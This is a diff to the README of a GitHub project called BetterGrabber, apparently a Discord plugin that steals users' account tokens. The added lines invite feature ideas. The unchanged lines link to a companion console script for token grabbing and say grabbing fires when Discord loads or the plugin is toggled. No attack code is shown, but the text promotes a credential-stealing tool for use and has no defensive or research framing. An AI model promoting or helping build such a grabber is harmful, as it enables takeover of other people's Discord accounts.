HideakiAtsuyo/BetterGrabber/README.md

 If you want to token grab with a little script to paste in your console(less infos but can be updated) => [CLICK HERE](https://github.com/HideakiAtsuyo/Discord-Token-Grabber-Console-Script)

+# Ideas
+If you have any idea [check this issue](https://github.com/HideakiAtsuyo/BetterGrabber/issues/15) and send your idea !

 # Grab When
 - Load Discord
 - Enable the Plugin if you modify the state (enabled/disabled)